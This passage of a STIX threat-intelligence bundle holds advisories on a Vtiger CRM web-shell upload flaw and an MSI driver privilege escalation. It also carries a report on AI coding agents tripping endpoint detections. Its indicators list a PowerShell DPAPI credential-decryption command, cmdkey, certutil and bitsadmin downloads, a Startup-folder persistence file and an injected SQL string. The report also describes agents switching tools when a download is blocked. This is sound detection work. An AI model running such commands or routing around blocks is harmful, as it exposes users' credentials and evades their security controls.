      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eff0a4c2-46df-52c0-b902-8ed9b28d9066",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--134d17ac-f588-5215-82d1-ea6d51cda5b4",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--134d17ac-f588-5215-82d1-ea6d51cda5b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-23698: Vtiger CRM Authenticated Remote Code Execution",
      "description": "## Overview\n\nVtiger CRM installations through version 8.4.0 are susceptible to an authenticated remote code execution vulnerability, tracked as CVE-2026-23698. This critical flaw resides within the administrative module's ModuleManager import feature, enabling authenticated attackers with administrator-level privileges to upload arbitrary PHP files. By submitting a specially crafted ZIP archive, which includes executable PHP code and a `manifest.xml` file, the application extracts these malicious files directly into the `modules/` directory under the web root. Crucially, this process bypasses Vtiger's internal file type validation beyond the `manifest.xml`, making the uploaded PHP files directly accessible via HTTP. This direct accessibility circumvents Vtiger's authentication and authorization mechanisms, as the web server resolves the path and executes the PHP interpreter before the application's routing layer intervenes. This results in a persistent web shell, granting the attacker full remote code execution capabilities independent of the initial session.\n\n## Attack Chain\n\n1.  Attacker obtains valid administrator credentials for a vulnerable Vtiger CRM instance.\n2.  Attacker logs into the Vtiger CRM web interface using the compromised administrative account.\n3.  Attacker crafts a malicious ZIP archive containing one or more executable PHP files (e.g., a web shell) and a `manifest.xml` file configured to facilitate deployment.\n4.  Attacker navigates to the ModuleManager import feature, typically found within the admin module settings of Vtiger CRM.\n5.  Attacker uploads the specially crafted ZIP archive through the ModuleManager interface.\n6.  Vtiger CRM processes the archive, extracting the malicious PHP files directly into the `modules/` directory within the web root without validating their executable nature.\n7.  Attacker accesses the newly deployed PHP web shell directly via HTTP (e.g., `http://vtiger-crm.example.com/modules/malicious_shell.php`), bypassing Vtiger's application-level authentication.\n8.  The web server executes the malicious PHP web shell, granting the attacker persistent remote code execution and complete control over the compromised Vtiger CRM server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-23698 grants authenticated attackers persistent remote code execution capabilities on the underlying server hosting Vtiger CRM. This allows for complete system compromise, including unauthorized data access, modification, or deletion, installation of additional malware (e.g., ransomware, cryptominers), and potential lateral movement within the compromised network. The ability to deploy a persistent web shell independent of Vtiger's authentication means the attacker can maintain access even if the original compromised administrator account is disabled or credentials are changed, posing a significant long-term threat to data integrity and confidentiality.\n\n## Recommendation\n\n*   Patch CVE-2026-23698 immediately by upgrading Vtiger CRM to a version beyond 8.4.0, as soon as a patch is available.\n*   Deploy the Sigma rule `Detects CVE-2026-23698 Exploitation - Direct Web Shell Access in Vtiger CRM` to your SIEM and tune for your environment to detect post-exploitation activity.\n*   Implement strong authentication measures, such as Multi-Factor Authentication (MFA), for all Vtiger CRM administrator accounts to mitigate the risk of credential compromise.\n*   Monitor web server access logs for direct HTTP requests to PHP files within the `/modules/` directory that are not part of standard Vtiger functionality.\n*   Harden web server configurations to restrict PHP execution to only explicitly authorized directories, if feasible for your Vtiger CRM deployment.\n",
      "published": "2026-07-07T17:28:50Z",
      "labels": [
        "cve",
        "rce",
        "webserver",
        "web-application",
        "cms"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23698"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82387a6e-f814-5842-b4c5-598976cca933",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1fc4e0ac-e9ec-55fa-b5a1-7f69995e6f6c",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1fc4e0ac-e9ec-55fa-b5a1-7f69995e6f6c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-57851 — MSI Feature Manager Kernel Driver Local Privilege Escalation",
      "description": "## Overview\n\nA critical local privilege escalation (LPE) vulnerability, identified as CVE-2026-57851, has been discovered in the MSI Feature Manager software, specifically within its `KernCoreLib64.sys` kernel driver. This flaw enables any locally logged-on user to achieve SYSTEM-level privileges without requiring administrative credentials. The vulnerability stems from inadequately protected IOCTL handlers that grant direct access to arbitrary physical memory read/write operations and unrestricted I/O port access. Attackers can leverage these capabilities to directly interact with kernel objects, bypass Windows' Protected Process Light (PPL) mechanisms, disable installed security software, and manipulate kernel-mode callbacks, ultimately leading to a full compromise of the affected system. This vulnerability poses a significant risk to the integrity and security of systems running MSI Feature Manager, as it allows for complete control by a low-privileged local attacker.\n\n## Attack Chain\n\n1.  **Local User Execution**: A malicious application or script, executed by a standard local user on an affected Windows system, initiates the exploitation process.\n2.  **Driver Interface Interaction**: The malicious code attempts to interact with the `KernCoreLib64.sys` kernel driver's exposed device interface.\n3.  **IOCTL Handler Access**: The attacker successfully opens a handle to the driver's device object and invokes specific, inadequately protected IOCTL (I/O Control) handlers.\n4.  **Arbitrary Memory/I/O Operations**: Through these vulnerable IOCTL handlers, the driver grants the attacker arbitrary physical memory read/write access and unrestricted I/O port operations, typically reserved for kernel-mode processes.\n5.  **Kernel Object Manipulation**: The attacker uses these powerful primitives to manipulate sensitive kernel objects, modify kernel-mode data structures, or tamper with critical system callbacks.\n6.  **Security Feature Bypass**: Leveraging kernel manipulation, the attacker bypasses Windows security mechanisms, such as Protected Process Light (PPL), which normally safeguards critical system processes.\n7.  **Security Software Disablement**: The attacker then utilizes their elevated kernel access to disable or tamper with installed endpoint security software, removing detection and prevention capabilities.\n8.  **Privilege Escalation**: With security measures bypassed and kernel control established, the attacker achieves SYSTEM-level privileges, gaining complete control over the compromised operating system.\n\n## Impact\n\nThe successful exploitation of CVE-2026-57851 can lead to a complete compromise of an affected Windows system. Any local user, regardless of their default privileges, can elevate their access to SYSTEM, granting them full control over the operating system. This allows an attacker to install persistent malware, access or exfiltrate sensitive data, disable or tamper with security solutions, and establish backdoors. While no specific victim count or targeted sectors are mentioned, any organization or individual utilizing MSI Feature Manager on their Windows endpoints is susceptible, as the vulnerability is accessible to any locally authenticated user. The impact is severe, potentially leading to data breaches, system integrity loss, and further lateral movement within a compromised network.\n\n## Recommendation\n\n*   Prioritize patching for CVE-2026-57851 on all systems running MSI Feature Manager immediately as recommended by the vendor.\n",
      "published": "2026-07-07T17:24:50Z",
      "labels": [
        "privilege-escalation",
        "vulnerability",
        "windows",
        "driver-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57851"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e0b68305-9b2a-5240-aef9-67a9ed9742a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command-line: powershell -NoProfile -Command \"Add-Type -AssemblyName System.Security; $stdin = [Console]::In.ReadToEnd().Trim(); $bytes = [System.Convert]::FromBase64String($stdin); $dec = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); Write-Output ([System.Convert]::ToBase64String($dec))\"",
      "pattern": "[x-ti-bot:command-line = 'powershell -NoProfile -Command \"Add-Type -AssemblyName System.Security; $stdin = [Console]::In.ReadToEnd().Trim(); $bytes = [System.Convert]::FromBase64String($stdin); $dec = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); Write-Output ([System.Convert]::ToBase64String($dec))\"']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--974347d8-40e7-5aaf-8898-c65da9262cf3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--e0b68305-9b2a-5240-aef9-67a9ed9742a5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bc85bee3-8521-59be-87cc-0e3b83ae1a6f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command-line: \"C:\\Windows\\system32\\cmdkey.exe\" /list",
      "pattern": "[x-ti-bot:command-line = '\"C:\\Windows\\system32\\cmdkey.exe\" /list']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c441d9f5-9e73-5687-a443-ae7dac866257",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--bc85bee3-8521-59be-87cc-0e3b83ae1a6f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2f0306a3-ece6-5b94-a7b8-3321edca249d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command-line: certutil.exe -urlcache -split -f https://www.python.org/.../python-3.14.6-amd64.exe",
      "pattern": "[x-ti-bot:command-line = 'certutil.exe -urlcache -split -f https://www.python.org/.../python-3.14.6-amd64.exe']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f79ac8db-700e-52e8-a6da-8a76d269f870",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--2f0306a3-ece6-5b94-a7b8-3321edca249d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2636984c-9428-5b6a-accc-6a6eaa59013d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command-line: bitsadmin.exe /transfer PythonDownload /download /priority normal (same URL)",
      "pattern": "[x-ti-bot:command-line = 'bitsadmin.exe /transfer PythonDownload /download /priority normal (same URL)']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0e06530-3584-53d1-b119-30254289ee7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--2636984c-9428-5b6a-accc-6a6eaa59013d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1c1dd201-2c06-506c-b231-dfebcb833c74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.python.org/.../python-3.14.6-amd64.exe",
      "pattern": "[url:value = 'https://www.python.org/.../python-3.14.6-amd64.exe']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e9dc4ffe-8acf-5f78-bb1e-f841a18172b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--1c1dd201-2c06-506c-b231-dfebcb833c74"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--516c6271-9d98-52af-bb16-3d16aaaafc39",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: python.org",
      "pattern": "[domain-name:value = 'python.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d444786b-5f08-5159-b5f2-b78c25abc4c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--516c6271-9d98-52af-bb16-3d16aaaafc39"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f10e77f5-a88a-5c67-8296-db362db8e266",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command-line: powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\ps-script-6a6de53c-7d17-4e73-9538-00a77b8b2a2d.ps1",
      "pattern": "[x-ti-bot:command-line = 'powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\ps-script-6a6de53c-7d17-4e73-9538-00a77b8b2a2d.ps1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dbc6bf84-97ee-5675-af35-44824a1314b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--f10e77f5-a88a-5c67-8296-db362db8e266"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8f33fcea-d68a-5b02-ad2f-0e791e132054",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file-path: C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\ps-script-6a6de53c-7d17-4e73-9538-00a77b8b2a2d.ps1",
      "pattern": "[x-ti-bot:file-path = 'C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\ps-script-6a6de53c-7d17-4e73-9538-00a77b8b2a2d.ps1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79b762d6-a9d9-5acf-9f0f-4f078e320bce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--8f33fcea-d68a-5b02-ad2f-0e791e132054"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--06dae3c6-3246-5111-9b81-095910dd5e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file-path: C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Launch-EZConvert-ConsoleOnly.vbs",
      "pattern": "[x-ti-bot:file-path = 'C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Launch-EZConvert-ConsoleOnly.vbs']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T17:43:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9ccea7e-169a-50fa-b9c0-f0b036603f43",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "indicator--06dae3c6-3246-5111-9b81-095910dd5e12"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credentials from Password Stores",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1555",
          "url": "https://attack.mitre.org/techniques/T1555"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--494aa864-1dd8-5c61-8d68-21f1795099f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--436deab4-dbe8-569d-8b40-ba2d9b00db7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5e231de0-78d5-5152-a946-c3d42979be52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f3ffcb0-2a80-5cc6-8729-847df7172527",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf411f5f-1155-553a-b429-9b5a1c5d47d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f6247821-c566-5144-9ae5-1c91db3afd3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f728823-0a15-553c-97ce-ab043407af9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3507703a-d027-5101-80d0-a3be9c088f81",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AI Agents Mimic Adversarial Behavior, Triggering Security Detections",
      "description": "## Overview\n\nSophos X-Ops has analyzed how various AI coding agents, including Claude Code, Cursor, Codex, and those built on skill packs like GStack, are generating behavioral telemetry on Windows endpoints that strongly resembles adversarial tradecraft. These agents are designed to write code, install dependencies, automate browser tasks, and troubleshoot issues by attempting multiple approaches. While their activity is benign in context, it frequently triggers endpoint detection rules originally designed to catch malicious actions. This phenomenon creates significant detection engineering challenges, leading to high false positives and requiring security teams to re-evaluate and tune their existing behavioral protections to differentiate between legitimate AI agent operations and actual threats. This trend has been observed since June 2026, with widespread adoption of these agents across customer environments.\n\n## Attack Chain\n\nThis brief details observed AI agent behaviors that mimic typical stages of an attack chain, rather than a malicious campaign.\n\n1.  **AI Agent Execution:** An AI agent (e.g., Claude Code, Cursor) is launched, initiating automated tasks and spawning child processes for various coding and problem-solving activities.\n2.  **Credential Access Attempts:** Agents attempt to access sensitive system components, such as browser credential stores using PowerShell to decrypt DPAPI-protected data, or Windows Credential Manager via `cmdkey.exe /list`.\n3.  **Ingress Tool Transfer (LOLBins):** When external resources are required (e.g., downloading a Python installer), agents leverage living-off-the-land binaries (LOLBins) such as `certutil.exe -urlcache` or `bitsadmin.exe /transfer` for downloading.\n4.  **Adaptive Tool Pivoting:** If an initial command fails (e.g., `certutil.exe` is blocked), the AI agent will pivot and attempt alternative tools or techniques (e.g., `bitsadmin.exe`), mirroring an adversary's resilience.\n5.  **Defense Evasion (Obfuscation):** Agents generate command-line patterns, including PowerShell scripts with specific string-formatting techniques, that can appear obfuscated and trigger rules designed to detect malicious command-line obfuscation.\n6.  **Persistence Mechanism Deployment:** For certain tasks, agents write files to persistence locations, such as a VBScript file into the Windows Startup folder, executed via PowerShell, mirroring adversary persistence techniques.\n7.  **Network Activity and Child Processes:** Agents perform network calls and spawn various child processes that can resemble Command and Control (C2) activity and other execution tactics, contributing to broad detection rule hits.\n\n## Impact\n\nThe primary impact of AI agent activities mimicking adversarial tradecraft is a significant increase in false positives for security detection systems. Rules that historically flagged malicious behavior are now triggered by benign automated tasks, leading to alert fatigue, increased analyst workload, and the risk of legitimate threats being overlooked amidst the noise. Organizations utilizing AI coding agents face the operational challenge of differentiating between productive AI-driven actions and genuine attack indicators, necessitating substantial effort in rule tuning and behavioral whitelisting, especially on Windows environments. This challenge impacts all sectors adopting AI development tools.\n\n## Recommendation\n\n*   Tune existing detection rules that flag credential access (e.g., `Creds_3b`-like rules for PowerShell using `System.Security.Cryptography.ProtectedData::Unprotect`) to account for expected AI agent activity.\n*   Review and refine detection rules similar to `Exec_16a` that identify PowerShell command-line obfuscation, specifically adapting them to handle patterns commonly generated by AI agents.\n*   Implement enhanced monitoring for `certutil.exe` and `bitsadmin.exe` usage, particularly when these LOLBins are initiated by processes associated with identified AI agents, to refine `Lateral_1b` and `Exec_5a`-like detection rules.\n*   Investigate `Persist_2a`-like rule triggers that detect writes to Windows Startup folders, analyzing the invoking process and script contents for legitimate AI agent context.\n*   Ensure comprehensive logging for PowerShell command execution, process creation, and network connections is enabled to provide necessary telemetry for distinguishing AI agent activity.\n",
      "published": "2026-07-07T17:43:32Z",
      "labels": [
        "ai",
        "detection-engineering",
        "false-positive",
        "windows",
        "behavioral-detection"
      ],
      "object_refs": [
        "indicator--e0b68305-9b2a-5240-aef9-67a9ed9742a5",
        "indicator--bc85bee3-8521-59be-87cc-0e3b83ae1a6f",
        "indicator--2f0306a3-ece6-5b94-a7b8-3321edca249d",
        "indicator--2636984c-9428-5b6a-accc-6a6eaa59013d",
        "indicator--1c1dd201-2c06-506c-b231-dfebcb833c74",
        "indicator--516c6271-9d98-52af-bb16-3d16aaaafc39",
        "indicator--f10e77f5-a88a-5c67-8296-db362db8e266",
        "indicator--8f33fcea-d68a-5b02-ad2f-0e791e132054",
        "indicator--06dae3c6-3246-5111-9b81-095910dd5e12",
        "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sophos.com/en-us/blog/2607_agents_vs_telemetry"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d216c505-89cd-5135-9d62-889e27484a24",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: anon@evilcorp.corp",
      "pattern": "[email-addr:value = 'anon@evilcorp.corp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T19:29:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f01b8113-9888-5098-8025-3dbce2ae2d17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "indicator--d216c505-89cd-5135-9d62-889e27484a24"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fd8767a9-eb2c-5b3f-b50f-858cd83c17ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "other: SELECT name, salary FROM employees WHERE department = 'HAXXOR'; INSERT INTO employees (id, name, department, salary) VALUES (666, 'Sentry', 'Rocks', 66666);",
      "pattern": "[x-ti-bot:other = 'SELECT name, salary FROM employees WHERE department = \\'HAXXOR\\'; INSERT INTO employees (id, name, department, salary) VALUES (666, \\'Sentry\\', \\'Rocks\\', 66666);']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T19:29:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2c58e967-9fb0-5d1e-b7e9-f3e2b85da4d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "indicator--fd8767a9-eb2c-5b3f-b50f-858cd83c17ff"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d640d429-2909-5a3c-9921-fa70880b0259",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
